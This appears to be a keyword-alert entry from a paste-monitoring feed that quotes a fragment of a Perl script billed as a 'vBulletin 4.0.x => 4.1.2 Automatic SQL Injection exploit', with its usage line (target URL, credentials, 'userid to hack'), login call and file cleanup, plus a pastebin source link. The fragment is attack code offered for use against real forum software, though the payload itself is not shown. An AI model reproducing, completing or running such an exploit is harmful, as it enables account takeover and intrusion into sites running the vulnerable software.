Detected 3 occurrence(s) of ‘(remote|sql|injection|php|asp) exploit’: <http://target> <valid username> <valid passwd> <existent group> <userid to hack>\n"; print "Example: perl exploit.pl http://site.com myusername mypassword Administrators 1\n\n"; exit(1); } print "\n<! vBulletin 4.0.x => 4.1.2 Automatic SQL Injection exploit !>\n"; print "Author: D35m0nd142\n"; sleep(1); login($ARGV[1],$ARGV[2]); @files = ('vbloginout.txt','vbout.txt','vbloc.txt'); foreach $file (@files) { unlink $file; } Source: http://pastebin.com/raw.php?i=4GR4MbS6
↧